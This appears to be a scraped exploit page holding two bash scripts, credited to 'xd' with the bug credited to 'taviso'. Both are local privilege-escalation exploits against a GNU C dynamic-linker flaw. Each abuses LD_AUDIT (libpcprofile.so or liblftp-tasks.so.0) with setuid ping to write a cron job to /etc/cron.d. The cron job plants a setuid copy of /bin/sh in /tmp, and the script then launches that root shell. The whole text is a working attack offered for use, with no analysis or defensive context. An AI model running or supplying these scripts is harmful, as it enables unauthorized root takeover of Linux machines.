#!/bin/bashecho ""echo "DSO GNU-C PCPROF dynamic-linker exploit using BASH not

1. #!/bin/bash
2. echo ""
3. echo "DSO GNU-C PCPROF dynamic-linker exploit using BASH not DASH! (coded by xd) bug by taviso"
4. echo "[+] Starting..";
5. echo ""
6. umask 0
7. LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/ex" ping
8. printf "* * * * * root cp /bin/sh /tmp/ex; chmod u+sx /tmp/ex\n" > \
9. /etc/cron.d/ex
10. echo "[!] waiting for shell..";
11. if [ /tmp/ex ]; then
12. echo "[!] Got root, jumping to '/tmp/ex' suid shell now..";
13. /tmp/ex
14. else
15. echo "[-] Sorry, exploit failed."
16. su
17. id
18. fi
19.  
20. ## AND LFTP method DSO
21.  
22. #!/bin/bash
23. echo ""
24. echo "DSO LFTP_HOME GNU-C dynamic-linker exploit using BASH not DASH! (coded by xd) bug by taviso"
25. echo "[+] Starting..\n";
26. echo ""
27. umask 0
28. LD_AUDIT="liblftp-tasks.so.0" LFTP_HOME="/etc/ex" ping
29. printf "* * * * * root cp /bin/sh /tmp/ex; chmod u+sx /tmp/ex\n" > \
30. /etc/cron.d/ex
31. echo "[!] waiting for shell..";
32. if [ /tmp/ex ]; then
33. echo "[!] Got root, jumping to '/tmp/ex' suid shell now..";
34. /tmp/ex
35. else
36. echo "[-] Sorry, exploit failed."
37. su
38. id
39. fi